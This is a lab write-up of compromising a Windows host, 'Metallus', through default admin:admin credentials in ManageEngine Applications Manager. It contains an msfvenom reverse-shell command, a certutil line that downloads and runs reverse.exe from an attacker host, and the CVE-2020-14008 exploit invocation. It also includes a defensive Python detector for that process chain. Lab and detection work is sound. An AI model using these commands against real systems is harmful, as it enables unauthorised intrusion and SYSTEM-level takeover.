# Metallus

## Nmap

```
sudo nmap 192.168.203.96 -p- -sS -sV

PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
5040/tcp  open  unknown
12000/tcp open  cce4x?
22222/tcp open  ssh           OpenSSH for_Windows_8.1 (protocol 2.0)
40443/tcp open  unknown
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  tcpwrapped
49693/tcp open  java-rmi      Java RMI
49718/tcp open  unknown
49796/tcp open  unknown
49797/tcp open  unknown
4 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
```

Working through the open ports, 40443 returned nothing useful to Nmap's service probes. Browsing to it reveals a login page: <http://192.168.100.96:40443/index.do>

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-516edb3dfccce8da3f144081a40d31d99c55a00a%2Fimage.png?alt=media)

The footer of the page identifies the software as ManageEngine Applications Manager (Build No: 14700). I was able to log in with a guess at the credentials `admin:admin`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-84ef88b1e053f6ccebcc1430bc787f54efd9b807%2Fimage.png?alt=media)

Applications Manager has a feature called *Actions*: programs or scripts that the server runs when a monitor condition (for example an alarm threshold) is met, or on demand. Because the server runs them under its own account, an administrator can turn this into code execution. To take advantage of it, first head to **Admin > Upload Files / Binaries** to upload a batch script.

Before uploading, generate a reverse shell executable with `msfvenom`:

```bash
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=443 -f exe -o reverse.exe
```

Once that is built, create a batch file to carry it, since only batch files and scripts are executed by the *Actions* on the target web server, not arbitrary executables.

Create a batch file (for example `reverse.bat`) containing the following line, which pulls `reverse.exe` from the attacking machine with `certutil` and then runs it. Note the URL has no port, so the web server on the attacking machine must listen on 80:

```batch
certutil.exe -f -urlcache -split http://<IP>/reverse.exe c:\windows\temp\reverse.exe && cmd.exe /c c:\windows\temp\reverse.exe
```

When uploading, make sure the bottom-most option, **Upload Script to \<Product\_Home>/working/**, is selected so the file lands in the directory that Actions execute from.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-300ec8bf492a97ecb2b457e9ae9691a3835cb7c0%2Fimage.png?alt=media)

After uploading, go to **Actions > Execute Program** and create a new Action as per the screenshot below:

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-34ddd1a3c9eb60413c4edde0dfde65c014e2cc91%2Fimage.png?alt=media)

After creating the Action, start a `netcat` listener on the port given to `msfvenom` (443 above), and start Python's **SimpleHTTPServer** (`http.server` on Python 3) on port 80 in the directory holding `reverse.exe`, since the certutil URL in the batch file specifies no port. Then go to **Actions > View Actions** and run the new Action manually from the **Execute** tab.

We should see the script download `reverse.exe` from the Python **SimpleHTTPServer**.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-b627311889caacf2f3413fac7027cf8272565cd8%2Fimage.png?alt=media)

Soon after, when the script executes `reverse.exe`, we should land a SYSTEM shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-262bfc74433d03d8470aa9c9075a09f954b69cd2%2Fimage.png?alt=media)
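From the defender's side, the chain above leaves a distinctive process tree: the Applications Manager `java.exe` spawns `cmd.exe` running a script from `<Product_Home>/working/`, which spawns `certutil.exe -urlcache` with an http URL, which is followed by an executable running from `C:\Windows\Temp`. The following detection logic is an added example, not part of this write-up or of ManageEngine's product. It assumes Sysmon Event ID 1-style fields (image, command line, parent image, PIDs), an install path of `C:\Program Files\ManageEngine\AppManager14`, and the attacker IP `10.10.14.5`; the sample events are constructed, and include two benign records (a harmless Action and a `certutil -verify`) to show that neither an Action script nor a certutil call alerts on its own.

```python
"""Correlate Sysmon-style process-creation events into the
Applications Manager Action -> certutil download -> exec-from-temp chain.
Added example with constructed telemetry; not the product's own code."""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One process-creation record, reduced to the fields used here."""
    pid: int
    ppid: int
    image: str
    cmdline: str
    parent_image: str


# certutil abused as a downloader: -urlcache together with an http(s) URL.
CERTUTIL_DOWNLOAD = re.compile(r"-urlcache\b.*\bhttps?://", re.I)
URL_RE = re.compile(r"https?://\S+", re.I)
# Assumed install layout (<Product_Home> = ...\AppManager<build>); the
# "Upload Script to <Product_Home>/working/" option drops scripts here.
APPMANAGER_WORKING = re.compile(r"\\appmanager\d*\\working\\", re.I)
# Writable staging directories a downloaded binary is typically run from.
TEMP_DIRS = ("c:\\windows\\temp\\", "c:\\users\\public\\")


def classify(ev: ProcEvent) -> list[str]:
    """Return the stage labels a single event matches (empty if benign)."""
    tags = []
    img = ev.image.lower()
    parent = ev.parent_image.lower()
    if img.endswith("\\certutil.exe") and CERTUTIL_DOWNLOAD.search(ev.cmdline):
        tags.append("certutil_remote_download")
    if (img.endswith("\\cmd.exe") and parent.endswith("\\java.exe")
            and APPMANAGER_WORKING.search(ev.cmdline)):
        tags.append("appmanager_action_script")
    if img.startswith(TEMP_DIRS) and img.endswith(".exe"):
        tags.append("exec_from_temp")
    return tags


def descendants(pid: int, by_parent: dict[int, list[ProcEvent]]) -> list[ProcEvent]:
    """All processes below pid in the parent/child tree."""
    out, stack = [], [pid]
    while stack:
        for child in by_parent.get(stack.pop(), []):
            out.append(child)
            stack.append(child.pid)
    return out


def detect_chain(events: list[ProcEvent]) -> list[dict]:
    """Alert only when an Action script spawned by java.exe has, somewhere in
    its process subtree, both a certutil download and an execution from a
    temp directory. The intermediate 'cmd.exe /c' hop is handled because the
    whole subtree is searched, not just direct children."""
    by_parent: dict[int, list[ProcEvent]] = {}
    for ev in events:
        by_parent.setdefault(ev.ppid, []).append(ev)
    chains = []
    for root in events:
        if "appmanager_action_script" not in classify(root):
            continue
        subtree = descendants(root.pid, by_parent)
        downloads = [e for e in subtree if "certutil_remote_download" in classify(e)]
        execs = [e for e in subtree if "exec_from_temp" in classify(e)]
        if downloads and execs:
            chains.append({
                "root_pid": root.pid,
                "script": root.cmdline,
                "download_pid": downloads[0].pid,
                "url": URL_RE.search(downloads[0].cmdline).group(0),
                "exec_pid": execs[0].pid,
            })
    return chains


# Constructed sample telemetry (assumed paths and PIDs): one attack chain plus benign noise.
JAVA = r"C:\Program Files\ManageEngine\AppManager14\jre\bin\java.exe"
CMD = r"C:\Windows\System32\cmd.exe"
WORKING = r"C:\Program Files\ManageEngine\AppManager14\working"
SAMPLE_EVENTS = [
    ProcEvent(4120, 812, JAVA, "java.exe -Xmx512m AMServer", r"C:\Windows\System32\services.exe"),
    ProcEvent(5208, 4120, CMD, f'cmd.exe /c "{WORKING}\\reverse.bat"', JAVA),
    ProcEvent(5216, 5208, r"C:\Windows\System32\certutil.exe",
              "certutil.exe -f -urlcache -split http://10.10.14.5/reverse.exe c:\\windows\\temp\\reverse.exe", CMD),
    ProcEvent(5224, 5208, CMD, "cmd.exe /c c:\\windows\\temp\\reverse.exe", CMD),
    ProcEvent(5230, 5224, r"C:\Windows\Temp\reverse.exe", "c:\\windows\\temp\\reverse.exe", CMD),
    # benign: an Action that only restarts a service, and an admin verifying a certificate
    ProcEvent(6100, 4120, CMD, f'cmd.exe /c "{WORKING}\\restart_iis.bat"', JAVA),
    ProcEvent(6110, 6100, r"C:\Windows\System32\net.exe", "net stop w3svc", CMD),
    ProcEvent(6200, 1200, r"C:\Windows\System32\certutil.exe", "certutil.exe -verify server.cer",
              r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        tags = classify(ev)
        if tags:
            print(f"pid {ev.pid:<5} {', '.join(tags):<28} {ev.cmdline}")
    for c in detect_chain(SAMPLE_EVENTS):
        print(f"ALERT chain rooted at pid {c['root_pid']}: {c['script']} -> {c['url']}")
```

Run stand-alone it prints the per-event stage labels and a single chain alert rooted at the `reverse.bat` Action; the `restart_iis.bat` Action and the `certutil -verify` call are labelled but never escalate to a chain. Requiring the full subtree keeps the alert specific to this technique while still catching the `cmd.exe /c` hop the batch file introduces.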

An alternative, more scripted route leverages **CVE-2020-14008**, which abuses JAR file upload.

**Description:**

Zoho ManageEngine Applications Manager 14710 and before allows an authenticated admin user to upload a vulnerable jar in a specific location, which leads to remote code execution.

**Reference:** <https://nvd.nist.gov/vuln/detail/CVE-2020-14008>

Searching with searchsploit shows an RCE exploit for build 14700.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-6a1b4617741e789653386d728b633c07f21b93bd%2Fimage.png?alt=media)

{% embed url="<https://www.exploit-db.com/exploits/48793>" %}

The syntax for the exploit script is shown below:

```bash
python3 48793.py <url> <username> <password> <reverse_shell_host> <reverse_shell_port>
python3 48793.py http://<IP>:40443 admin admin <Attacker-IP> 443
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-52a8bda197fefd51dcc7b38dc288a76dd45fdd39%2Fimage.png?alt=media)

After execution we should have another SYSTEM shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-4ce7dfd2067dd15e7c9e73cb12dfa7e659e5794c%2Fimage.png?alt=media)
